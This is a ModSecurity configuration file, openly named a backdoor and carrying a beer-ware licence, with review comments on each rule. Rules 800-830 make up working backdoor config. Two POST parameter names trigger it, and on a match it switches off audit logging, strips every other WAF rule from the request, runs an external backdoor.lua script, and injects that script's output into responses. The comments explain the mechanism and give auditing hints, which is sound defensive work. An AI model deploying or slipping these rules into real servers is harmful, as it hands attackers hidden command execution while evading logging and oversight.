backdoor.conf
# "THE BEER-WARE LICENSE" (Revision 42):
# <[email protected]> wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. Jozef Sudolsky
# Rule 800: unconditional setup. SecAction has no match condition, so this
# runs in phase 1 of every transaction. It stores two POST parameter names in
# TX variables; rules 810 and 820 compare request argument names against them.
# nolog keeps the rule out of the error and audit logs.
# NOTE(review): an always-on, unlogged SecAction that only seeds trigger names
# is worth flagging when auditing a WAF rule set.
SecAction \
"id:800,\
phase:1,\
nolog,\
pass,\
t:none,\
setvar:'tx.backdoor_file_argument_name=backdoor_file',\
setvar:'tx.backdoor_command_argument_name=backdoor_command'"
# Rule 810: matches when a POST parameter NAME equals the value held in
# tx.backdoor_file_argument_name (set by rule 800). On a match it records the
# request type as "file" and, for the current transaction only:
#   - ctl:auditEngine=Off                       switches audit logging off
#   - ctl:ruleRemoveById=1-799 / 900-99999999   removes every rule whose id is
#                                               outside 800-899, which leaves
#                                               this file's rules (800-830)
# Combined with nolog, the matching request is not inspected by any other rule
# and leaves no ModSecurity log entry. WAF logs therefore cannot be relied on
# to show that this rule fired; detection has to come from reviewing and
# integrity-checking the rule files that are actually loaded.
# Audit hint: ctl:auditEngine=Off together with ctl:ruleRemoveById ranges that
# span almost the whole id space is far broader than a normal false-positive
# exclusion and should be treated as suspicious.
SecRule ARGS_POST_NAMES "@streq %{tx.backdoor_file_argument_name}" \
"id:810,\
phase:2,\
pass,\
nolog,\
setvar:'tx.backdoor_request_type=file',\
ctl:auditEngine=Off,\
ctl:ruleRemoveById=1-799,\
ctl:ruleRemoveById=900-99999999"
# Rule 820: same structure as rule 810, keyed on the second trigger name
# (tx.backdoor_command_argument_name from rule 800). On a match it records the
# request type as "command", switches the audit engine off for the transaction
# and removes every rule whose id is outside 800-899.
# As with rule 810, nolog plus ctl:auditEngine=Off means the match is not
# written to the ModSecurity logs, so the rule file itself is the evidence to
# look for during a configuration review.
SecRule ARGS_POST_NAMES "@streq %{tx.backdoor_command_argument_name}" \
"id:820,\
phase:2,\
pass,\
nolog,\
setvar:'tx.backdoor_request_type=command',\
ctl:auditEngine=Off,\
ctl:ruleRemoveById=1-799,\
ctl:ruleRemoveById=900-99999999"
# Rule 830: a chain of three rules evaluated in phase 4 (response body).
#   1. &TX:BACKDOOR_REQUEST_TYPE counts the variable; "@eq 1" holds only when
#      it has been set, which in this file is done by rules 810 and 820.
#   2. @inspectFile runs the external script backdoor.lua against the request
#      type. The script is not part of this file.
#      NOTE(review): presumably the script sets tx.backdoor_output - confirm
#      against the script itself.
#   3. @rsub rewrites the outgoing response body, replacing the character
#      matched by ".$" (the end of the body) with the expanded value of
#      tx.backdoor_output.
# Net effect: a component meant only to filter traffic executes a local script
# and alters responses, while rules 810/820 and nolog keep it out of the logs.
# Audit hints: an @inspectFile target that is not part of the reviewed rule
# set, and @rsub applied to STREAM_OUTPUT_BODY. Response rewriting of this
# kind normally also depends on SecStreamOutBodyInspection and
# SecContentInjection being enabled (confirm for the deployed version), so
# check those settings in the main configuration as well.
SecRule &TX:BACKDOOR_REQUEST_TYPE "@eq 1" \
"id:830,\
phase:4,\
pass,\
nolog,\
chain"
SecRule TX:BACKDOOR_REQUEST_TYPE "@inspectFile backdoor.lua" "chain"
SecRule STREAM_OUTPUT_BODY "@rsub s/.$/%{tx.backdoor_output}/"